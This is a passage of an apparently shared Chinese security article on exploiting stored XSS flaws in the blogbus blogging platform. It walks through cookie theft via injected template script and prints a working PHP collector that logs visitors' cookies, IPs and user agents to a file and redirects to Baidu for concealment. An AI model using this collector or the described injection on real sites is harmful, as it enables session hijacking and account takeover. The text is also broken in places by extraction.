欢迎来到天天文库
浏览记录
ID:13679194
大小:1.92 MB
页数:22页
时间:2018-07-23
《跨站脚本攻击实例解析》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、跨站脚本攻击实例解析作者:泉哥主页:http://riusksk.blogbus.com前言跨站攻击,即CrossSiteScriptExecution(通常简写为XSS,因为CSS与层叠样式表同名,故改为XSS)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。很多人对于XSS的利用大多停留在弹框框的程度,一些厂商对XSS也是不以为然,都认为安全级别很低,甚至忽略不计。本文旨在讲述关于跨站攻击的利用方式,并结合实例进行分析。漏洞测试关于对XSS的漏洞测
2、试,这里就以博客大巴为例进行测试,最近我也在上面发现了多处跨站漏洞,其中两处已公布在WooYun网站上,其主要内容如下:漏洞详情简要描述:博客大巴存储型XSS漏洞详细说明:在“个人信息设置”的“附加信息”一项中,由于对“个人简介”的内容过滤不严,导致可在博客首页实现跨站,而在下方“添加一段附加信息”中,由于对“信息标题”内容过滤不严,同样可导致跨站的出现。但我刚又测试了一下,发现官方只修补了其中一个漏洞(个人简介),而另一个漏洞得在博客管理后台才能触发,利用价值不大。与此同时我在对博客模板的测试中,又发现了五处跨站漏洞,估计这些漏洞其实很早就有人发现了,只是没人公布或者报给blo
3、gbus后仍未修补。这次报给WooYun的主要目的是让blogbus修补此漏洞,因为我的博客就在上面!^_^其余五处漏洞分别在“编辑自定义模板”中,由于对代码模块head,index,index-post,detail,detail-post等处的代码过滤不严,导致跨站的发生,分别向其写入,为便于区别,我将提示语句更改为对应的名称,前三项在首页可触发脚本,后两项需打开文章才可触发,测试结果如图1、2所示:图1(在首页触发)图2(打开文章触发)对于其它网站的测试基本也是大同小异,除了手工测试外,你还可使用
4、其它一些自动扫描工具,比如AcunetixWebScanner……漏洞利用一、窃取Cookie对于跨站的攻击方法,使用最多的莫过于cookie窃取了,获取cookie后直接借助“明小子”工具或其它可修改cookie的浏览器(如装有CookiesEdit插件的Firefox)将cookie修改为获取的cookie,这样即可获得博客的管理权限。首先,我们在自定义模板的head代码模块中写入或者这里我把脚本放在本机上,你可以根据脚本地址来更改上面的localhost地址。以上两个均可达到同等效果,但就隐蔽性而言,前者的隐蔽性会更强些,读者可自行选择,当然也有其它语句可达到一样的目的,就看你如何发挥了。接下来我们来编写上面的test.php文件,它主要用于获取对方的cookie,其源代码如下:
6、//以GET方式获取cookie变量值$ip=getenv('REMOTE_ADDR');//远程主机IP地址$time=date('Y-m-dg:i:s');//以“年-月-日时:分:秒”的格式显示时间$referer=getenv('HTTP_REFERER');//链接来源$agent=$_SERVER['HTTP_USER_AGENT'];//用户浏览器类型$fp=fopen('cookie.txt','a');//打开cookie.txt,若不存在则创建它fwrite($fp,"IP:".$ip."DateandTime:".$time."UserAgent:"
7、.$agent."Referer:".$referer."Cookie:".$cookie."");//写入文件fclose($fp);//关闭文件header("Location:http://www.baidu.com");//将网页重定向到百度,增强隐蔽性?>接下来我们访问博客首页,我这里以http://quan-ge.blogbus.com为测试地址,访问后我们打开http://localhost/cookie.txt看看cookie.txt文件是否被
此文档下载收益归作者所有